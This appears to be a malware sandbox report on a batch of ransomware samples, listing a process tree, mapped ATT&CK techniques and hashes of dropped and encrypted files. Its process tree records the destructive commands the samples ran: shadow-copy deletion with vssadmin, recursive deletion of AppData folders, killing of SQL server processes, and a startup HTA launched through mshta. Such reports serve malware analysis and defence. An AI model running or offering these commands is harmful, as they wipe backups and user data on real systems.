    Trojan-Ransom.Win32.Blocker.mogu-25a3cd8ab210bb51a2c3f51c1c5493fd49692a9a609f1d0cc7ab0bb5584b7027.exe
    3⤵
    PID:5452
  - - C:\Users\Admin\Desktop\00382\update.exe
      C:\Users\Admin\Desktop\00382\update.exe
      4⤵
      PID:7904
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crusis.dyo-76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5.exe
    Trojan-Ransom.Win32.Crusis.dyo-76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5.exe
    3⤵
    PID:5700
  - - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crusis.dyo-76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5.exe
      C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crusis.dyo-76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5.exe
      4⤵
      PID:7600
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        5⤵
        
        PID:7532
      - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        6⤵
        
        PID:6804
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:4520
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        5⤵
        
        PID:20236
    - - C:\Windows\System32\mshta.exe
        
        "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
        5⤵
        
        PID:1476
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crusis.to-2f2e75affe9217c7211043936678fb1777e2db4a8f1986b8805ddb1e84e9e99b.exe
    Trojan-Ransom.Win32.Crusis.to-2f2e75affe9217c7211043936678fb1777e2db4a8f1986b8805ddb1e84e9e99b.exe
    3⤵
    PID:5992
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:6080
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:5660
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:7868
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:9688
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
      4⤵
      PID:4968
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crypren.agva-6a03b0f08d528e5cd9bf6be5bbf7759363ff4daeb06bc2c6a11e302416b83969.exe
    Trojan-Ransom.Win32.Crypren.agva-6a03b0f08d528e5cd9bf6be5bbf7759363ff4daeb06bc2c6a11e302416b83969.exe
    3⤵
    PID:6472
  - - C:\Users\Admin\AppData\Local\Temp\is-UQBU1.tmp\Trojan-Ransom.Win32.Crypren.agva-6a03b0f08d528e5cd9bf6be5bbf7759363ff4daeb06bc2c6a11e302416b83969.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-UQBU1.tmp\Trojan-Ransom.Win32.Crypren.agva-6a03b0f08d528e5cd9bf6be5bbf7759363ff4daeb06bc2c6a11e302416b83969.tmp" /SL5="$A0586,4489380,57856,C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Crypren.agva-6a03b0f08d528e5cd9bf6be5bbf7759363ff4daeb06bc2c6a11e302416b83969.exe"
      4⤵
      PID:4352
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Foreign.okhv-500b1f92177cd2b40ae86b34b9336a469a8525a715a0dcf5bc8305896311ac86.exe
    Trojan-Ransom.Win32.Foreign.okhv-500b1f92177cd2b40ae86b34b9336a469a8525a715a0dcf5bc8305896311ac86.exe
    3⤵
    PID:6572
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Gen.hor-15099b4065f5461584353afc197d300483964e9bc24bced7898791c62cff6aaa.exe
    Trojan-Ransom.Win32.Gen.hor-15099b4065f5461584353afc197d300483964e9bc24bced7898791c62cff6aaa.exe
    3⤵
    PID:6468
  - - C:\Users\Admin\AppData\Local\Temp\ShowDrive.exe
      C:\Users\Admin\AppData\Local\Temp\ShowDrive.exe *
      4⤵
      PID:16020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\dsptw.exe /a /pdr /y
      4⤵
      PID:16048
    - - C:\Users\Admin\AppData\Local\Temp\dsptw.exe
        
        C:\Users\Admin\AppData\Local\Temp\dsptw.exe /a /pdr /y
        5⤵
        
        PID:11696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\dsptw.exe 1 /find:all /ghoststyle /y
      4⤵
      PID:19108
    - - C:\Users\Admin\AppData\Local\Temp\dsptw.exe
        
        C:\Users\Admin\AppData\Local\Temp\dsptw.exe 1 /find:all /ghoststyle /y
        5⤵
        
        PID:18852
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.PolyRansom.cfhj-51d1f5e29515698caaf9909ba2fd63d1190c2f8f55a53fb4c5055bdcd66965c6.exe
    Trojan-Ransom.Win32.PolyRansom.cfhj-51d1f5e29515698caaf9909ba2fd63d1190c2f8f55a53fb4c5055bdcd66965c6.exe
    3⤵
    PID:9424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9424 -s 852
      4⤵
      Program crash
      PID:8736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9424 -s 852
      4⤵
      Program crash
      PID:10156
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.PornoAsset.dihs-549a0aeab4402c6732d22c1504cc3727ade3037a38a0217fee17409e40eefe7d.exe
    Trojan-Ransom.Win32.PornoAsset.dihs-549a0aeab4402c6732d22c1504cc3727ade3037a38a0217fee17409e40eefe7d.exe
    3⤵
    PID:6716
  - - C:\Windows\SysWOW64\WinSrvm32.exe
      C:\Windows\System32\WinSrvm32.exe
      4⤵
      PID:3760
  - - C:\Windows\SysWOW64\cmd.exe
      /c del TR97E9~1.EXE >> NUL
      4⤵
      PID:7812
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Sodin.aaq-8887e1b4df56f146b0f8372c4a19ac50ff722f491be848c4831dee06c64ffc30.exe
    Trojan-Ransom.Win32.Sodin.aaq-8887e1b4df56f146b0f8372c4a19ac50ff722f491be848c4831dee06c64ffc30.exe
    3⤵
    PID:4816
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Sodin.bi-0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999.exe
    Trojan-Ransom.Win32.Sodin.bi-0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999.exe
    3⤵
    PID:16596
- - C:\Users\Admin\Desktop\00382\Trojan-Ransom.Win32.Sorena.s-c053df842991d751eb53b271d7f3b4e8d6362633a1b79a6d8341c058057a90ae.exe
    Trojan-Ransom.Win32.Sorena.s-c053df842991d751eb53b271d7f3b4e8d6362633a1b79a6d8341c058057a90ae.exe
    3⤵
    PID:14656
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlservr.exe /T"
      4⤵
      PID:14192
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlservr.exe /T
        5⤵
        Kills process with taskkill
        
        PID:7788
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlceip.exe /T"
      4⤵
      PID:10276
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlceip.exe /T
        5⤵
        Kills process with taskkill
        
        PID:7196
  - - C:\Windows\system32\cmd.exe
      cmd /C "taskkill /F /IM sqlwriter.exe /T"
      4⤵
      PID:7572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM sqlwriter.exe /T
        5⤵
        Kills process with taskkill
        
        PID:7132
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Admin\AppData /s /q"
      4⤵
      PID:12676
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Default\AppData /s /q"
      4⤵
      PID:11516
  - - C:\Windows\system32\cmd.exe
      cmd /C "rmdir C:\Users\Public\AppData /s /q"
      4⤵
      PID:7504
- - C:\Users\Admin\Desktop\00382\VHO-Trojan-Ransom.Win32.Convagent.gen-31df73aeb48ae157b6efc3f6ad04e73a7d6830c5a133cae50dfd0eded3a56288.exe
    VHO-Trojan-Ransom.Win32.Convagent.gen-31df73aeb48ae157b6efc3f6ad04e73a7d6830c5a133cae50dfd0eded3a56288.exe
    3⤵
    PID:20780

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3096

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2744

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4196

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\922fe4d0aa1547f7b937747534f067d1 /t 4528 /p 3096
1⤵
PID:5264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:5940

C:\Windows\system32\vssadmin.EXE
C:\Windows\system32\vssadmin.EXE Delete Shadows /All /Quiet
1⤵
- Interacts with shadow copies
PID:5956

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6008
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1B75EC624759AEF5E13CE35E4DC2B2F9
  2⤵
  PID:6040
- - C:\Users\Admin\AppData\Local\Temp\0B307F28-58ED-403A-980A-AA652CC26F56\lite_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\0B307F28-58ED-403A-980A-AA652CC26F56\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER
    3⤵
    PID:9248
- - C:\Users\Admin\AppData\Local\Temp\920A754F-5196-4793-97D6-972DF0834428\seederexe.exe
    "C:\Users\Admin\AppData\Local\Temp\920A754F-5196-4793-97D6-972DF0834428\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\451E6F8C-94B8-4D79-9D8D-848F119CD6CD\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"
    3⤵
    PID:20652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5336 -ip 5336
1⤵
PID:6948

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:7132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5336 -ip 5336
1⤵
PID:7464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5336 -ip 5336
1⤵
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 9424 -ip 9424
1⤵
PID:5620

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\a6bf741e817a4a8c9e942471f0d93e13 /t 7092 /p 7132
1⤵
PID:7984

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6032

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:20552

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\1fba144a6afb44c5bf1dae48fe7171cc /t 1948 /p 6032
1⤵
PID:11080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5336 -ip 5336
1⤵
PID:9532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5336 -ip 5336
1⤵
PID:20152

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:18688

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:14012

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\79f27200541c4cd3a19d7baf0f1e043e /t 10868 /p 18688
1⤵
PID:7944

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:20596

C:\Users\Admin\AppData\Local\Temp\{BA0987E1-9570-4E94-AE41-C11074E7063A}.exe
"C:\Users\Admin\AppData\Local\Temp\{BA0987E1-9570-4E94-AE41-C11074E7063A}.exe" --job-name=yBrowserDownloader-{09FC1100-8505-4544-A577-E2EDE391689D} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{BA0987E1-9570-4E94-AE41-C11074E7063A}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={f193b230-96b4-4b82-82ff-2c93caa8f0cf} --use-user-default-locale
1⤵
PID:10684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5336 -ip 5336
1⤵
PID:9376

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\A4AA9-Readme.txt
1⤵
PID:14820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5a14c6.rbs

Filesize
911B

MD5
5017b1b780837420e17598005b0fcdbf

SHA1
977d51011d2936f7f0df53b9ca8df8d38adeaa8e

SHA256
fc81e6ff9ef582f9606d87728d171fcfa304ea688cfa4370e987a434ce713e0a

SHA512
e56cd5288fd6646a24ad6caeafb7dae6f5436791db1274bd68ac3fc6418c93b1c08cd969043abc9ac6a7eec2988c45b5f001e16550e96678d310a3b64faa2734

Download Submit
C:\PICC\Examples\USB\HidDemoVB\PC Software\BIN\Debug\is-B98ET.tmp

Filesize
1KB

MD5
434b4e82b02777142b385c9cc227c430

SHA1
9384aeb8643ea3e781fa0ab8cf9a35c350e8d994

SHA256
80279ed21cb0e4d9fcf633606afa4f64695159bc7cd881ade41283f54053ab5e

SHA512
03bb91e3ebe3a97d4e8a42e0534073130d8b7049099d8ed4ec5b27e7b6c81a8bba3ea25c069f83c3c8be16c221da35fe12b6360f2ef64585fe95e2c456a9c5d9

Download Submit
C:\PICC\Examples\USB\HidDemoVB\PC Software\BIN\Release\is-M2E39.tmp

Filesize
42KB

MD5
46783922be4e03ebc51b0729e7d2b439

SHA1
b7fc2f6361c56d6207f9c7b7f1336f90490e9cc0

SHA256
9864f0bbc2d632517a37882a18db5f812e22d1fe2f1f79aa70cc05dca59cd110

SHA512
a2ec38f647e8749043d58053d459f69702ed44ea3bcaeb5b0d7b579856ae9a156ae4030cd452d2cb1390fa21f6a70b57cc332fcacc28da6456f1977eabfad23f

Download Submit
C:\PICC\Examples\USB\HidDemoVB\PC Software\OBJ\Debug\is-K4C2K.tmp

Filesize
180B

MD5
d85fe5b9a2e22066b1d7dc89c16ee527

SHA1
78147369bcac902b8aefbe59e26852e0e179bfb6

SHA256
a3237a994521c1904b0367691fdafc8b4b309371b845157bd149f27b53849d76

SHA512
c6db19663c1dec0d3d8c34b33f516d51ca8f9cc2710aa5d746c2cf65ee0e2ffc6a4ea2c22e98c7a8c9271daf51d0b787d2b6ad2b3b3f9298ddc9a3d4b162d37b

Download Submit
C:\PICC\Examples\USB\HidDemoVB\PC Software\OBJ\Debug\is-N33U3.tmp

Filesize
1KB

MD5
fe90b51a1806ed133f68824c311de850

SHA1
6e47a135b74f8becd4df5ffa974da029f1311211

SHA256
4819e6ef3efbf02fd67aa6b456d4fa1338e7d52e1aed1562d09d640e0d9af8cb

SHA512
c30bde14cdd6252b6237f8c35802159419a9876cd57971792068924eb53c3c5294089fcfdeec663fead4fd0fdcc1d20946ec3adc2a3470ae05f3b9dad93f227b

Download Submit
C:\PICC\Examples\USB\OScopeVB MCHPUSB\PC Software\BIN\Debug\is-3L4PN.tmp

Filesize
58KB

MD5
bbfdabec8671ba1864380403a2ab9c92

SHA1
f9df966f861bb2d4394de13edb5754bfacb2820e

SHA256
207c7706cce2d4a03837c12744c5ea87266422d8bb5a4142ab3f5510f45fafa3

SHA512
fda5e20c27858bf62309f5f746e1d53d9c12950b3830e6329b84d08cfa24fa454077b10895d06a1077dcb6b225d39bd406dc5e4649675ca8647acdb6d9574af4

Download Submit
C:\PICC\Examples\USB\OScopeVB MCHPUSB\PC Software\is-IT929.tmp

Filesize
6KB

MD5
c3c1411bfa61592304217e338c7b28c2

SHA1
6748ddd0b4ecedaa449bbbc6b21d906302260239

SHA256
a0a52d695120fba5382fb73d01e677cf8f4444e3e06433538138330a5ba5264c

SHA512
54d517d40cee2920f5014db19eaa0975a04dfd67b0a6ae4bed5ad33ebaaeb03913c6b569f55a319dae5b7133b999429c01994e987a4f27f4520a397f4b622d80

Download Submit
C:\PICC\Examples\USB\OScopeVB MCHPUSB\PC Software\is-MJA8K.tmp

Filesize
296KB

MD5
439f58c4236f908290f4bbd8453bb831

SHA1
94a2edcfa0819a1e66e1c32efc88c82d86a921ca

SHA256
d92e698f0442f9a86fd7aa859cb92030722509b1db4e510d4cb83ff159d5d925

SHA512
9db71567bf2ac9c8f18075cfe0dc761c8be064dfdea4fafc5cc917a98d4818ea5d7e32f354464ea7e03842272fc201d38996d37c20cab52d4f44cbf88d9eda5f

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\BIN\Debug\is-K6SIS.tmp

Filesize
13KB

MD5
f2f77b99cad96e1b6ca06169f3553f40

SHA1
d8dc079a82b4942f36e8d11a0ff88b97c098a64a

SHA256
9149c19a31ff9ca73bf60893e2dfaa8fbefec42de2a288b1b32c15ff730955ca

SHA512
b12b8461d9ebc96e9e2cca5da66cf342e7eacfcbe00ab50180433ded7ca2426837ec2d280171eb8e95f092097ab5dc64b895973be2e31103b8f27e9062bdd915

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\BIN\Release\is-6EN0D.tmp

Filesize
36KB

MD5
b36cb5b9bc97e9c288f4b47871d736c1

SHA1
55ef10cc3e664550d9bd2fe34a30dcabbb63f170

SHA256
b16858c0ce5e1a93727aed0e4639cb3f00df3aede7a059b3095f3637612604c8

SHA512
b210886dcaa4d717924b8d65c634b35f0dabf88e246017856165ea6175ba00325b71e8dba51d88a2bd4750aa1fe2fc77d5be90a5813519d8e045034ccaddfb1e

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\My Project\is-5PAUS.tmp

Filesize
279B

MD5
4a12ce12282d0ee237b12e7513037c50

SHA1
9a820bef12266f5e641770f44af881f9517f5222

SHA256
aee1c3cda12a474a7a8ead292418eb734cde3c4a74a4977e0bb0ed160613a1eb

SHA512
c8229ffec5e3a2df33855a22f53fade99c88e7c92404c35529d2168ef21597de0477164fb888da7192fb3745d47980fa4e8a6259485dfe5a34b481ddd780a432

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\My Project\is-KICM3.tmp

Filesize
5KB

MD5
0cd8c971317d19bbed44757809bcb92b

SHA1
47b15748ecc8e952c5935170090db7c269ce4b4f

SHA256
66b5ebd1b0fc73f041ba669ce2184f6f471d5e3524efa34ca31233e9f5395262

SHA512
883dba84bf7daae3ea49f9d54c13dda4f125da82ba63f90eeba0900602896ad9492a0adf7b69b67d838034090af20926af5c2934797afaadb38aa069786c1fc6

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\OBJ\Debug\is-A3256.tmp

Filesize
272B

MD5
965a30d7c4cc5579d1df7528090179d3

SHA1
b4a45db7e8ac167d91eeb0013387b48aaadf3d45

SHA256
d0d45b9f6065dbf0c3900ddad0de254f94d3fbb2d54f9d5d64ad1d2729ffe08e

SHA512
73c9c9195336d6c4fbc692d43408f14bb0438bc44fb8c7ca170dd6f8378c06a75837cb07642ae1bf753a24ca9b524d1b7eb1bd66dabc9074dc45c5ea43d38e1c

Download Submit
C:\PICC\Examples\USB\OScopeVB WinUSB\PC Software\OBJ\Debug\is-REQTT.tmp

Filesize
19KB

MD5
62bca7ef887b9ee59155c5a9874e337e

SHA1
73966313d15f228cf46c811bbd100fe69521f115

SHA256
5a2d45a2e7e4f9cea9bb3064604fe2a91af1242fe520346c190ae8a9fffe619e

SHA512
14ca973437334ac4619697da12ab3287a7b6a47b4cc34b190a93e7595232cc0ccfd7a5a961eb72d92b3d0210d49991e356dbec6cd5bc5b0f4efc69ad247e07a0

Download Submit
C:\Program Files\7-Zip\7z.dll.id-7B736861.[[email protected]].pgp

Filesize
2.5MB

MD5
34901620593395cc6f67d808c21bbd80

SHA1
08df55662f26b296e055d2ff68b299d8179706f0

SHA256
4d3c1bf34b14e817daf13c14311f396ee6fa5f930247da8bd25d606810f32821

SHA512
07fd6d8edfbd342fa88349b936f9d24178c4617b624d308f4770ea2a890630eb10ee164b1dc3cf6f7e811041c45226dcd58c3872f9ba6c8b478b66982a1a4f2a

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml.id-7B736861.[[email protected]].pgp

Filesize
4.8MB

MD5
8e09b2b42552b15138b8fd1f74399022

SHA1
1cde9b90dff9cd95c2b22fd0343636814243ad8f

SHA256
84e8b0386ad0bcd962c308832f693ed6a85759ff9713998908296b4436513535

SHA512
9fae51c8e0717e7c830e3ecf6f99450b4f6aeeb92f301e74bb0f563b574c876dd7acc0f794674c5928843cc84811f05f6bca72f8115e1df303a349b36c8b4a12

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Trojan-Ransom.Win32.Crusis.dyo-76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5.exe

Filesize
731KB

MD5
86412537e7c55b380d2e8a501e452b18

SHA1
5ef915530391ced6b06a71199c71a6b385f8b7da

SHA256
76ccab8734a4cd7dc8c839167e9373349a3ccb276c7d05bfd64d2c8efb2441d5

SHA512
76556ad3a4f386ec4101e4dc1a2bf9918c595c49c9deb669d3f113cc2fedf29f03ccaddeca7f06471c8e9e96dc79be16d9166887261e8df9aec778eeb4b45106

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Trojan-Ransom.Win32.Crusis.to-2f2e75affe9217c7211043936678fb1777e2db4a8f1986b8805ddb1e84e9e99b.exe

Filesize
92KB

MD5
1ebb6bb49ac1077c5e7eba4d56f6a3a1

SHA1
1a37bb789c7bdda44330fd55aa292f5f76dada5d

SHA256
2f2e75affe9217c7211043936678fb1777e2db4a8f1986b8805ddb1e84e9e99b

SHA512
2f347be73b13bdac66fa52cfdc8d29ead8588ab350e1e62f99518d346e1d8c2dbfb9eda40438c628ef94c657ff6fb2f3fb928c94a1d87f93341339541abbf74d

Download Submit
C:\ProgramData\Package Cache\{d87ae0f4-64a6-4b94-859a-530b9c313c27}\A4AA9-Readme.txt

Filesize
1KB

MD5
dd8fc689db3f0d41d2b791312c9d398e

SHA1
86f1f0ba100f0d751a5dc895e3f2c9bd82718a49

SHA256
9856e45278f8cbd2615d413a254273284efeaef6e515a3aebb67e7decc2c1e72

SHA512
e70b51c23d72fb52bd407ed0e3844aafc521a0c356d13621c0af6a2fb2d4e154697502c0adcc327f7d1f5b0dd963db1238e05e416fce16708c5e6a963271207f

Download Submit
C:\ProgramData\vevwmEZEmt\atilaXmr

Filesize
1.7MB

MD5
8fb9bffd3d5fb378ff59f54db2b4d24c

SHA1
22f77b73d819a80acaadb1c376141fd841a7666a

SHA256
b0a0cf95d5d41c25dfe41717187a4acc5996f55b4a637586f08868f00d6d9982

SHA512
df23788bd50c61f11f07e0bac7c532ec7dcbfee40a678875a5e5ec31f18b958b47cb693d154f886d1b7c470aa520bf4a5e352684fa75238355f24dd9cf444367

Download Submit
C:\Users\Admin\3D Objects\077532-readme.html

Filesize
49KB

MD5
f9e258f5419daac691e94d2c7eb8c7c7

SHA1
6950dad294bddb1d77975c0611a421042b18501a

SHA256
eb5b5b10b2d7f2718955c55fd2b7760cb79c0f1466c2705facdddcaf476a0e7e

SHA512
1fe06e3f9c70c80a946de073c64e1ed92ee832e9b7821d889f55a821abd680d142dd5ea4ba22f303b9c057b5e9f595153b644e369cf7374e166853a79ecebef8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
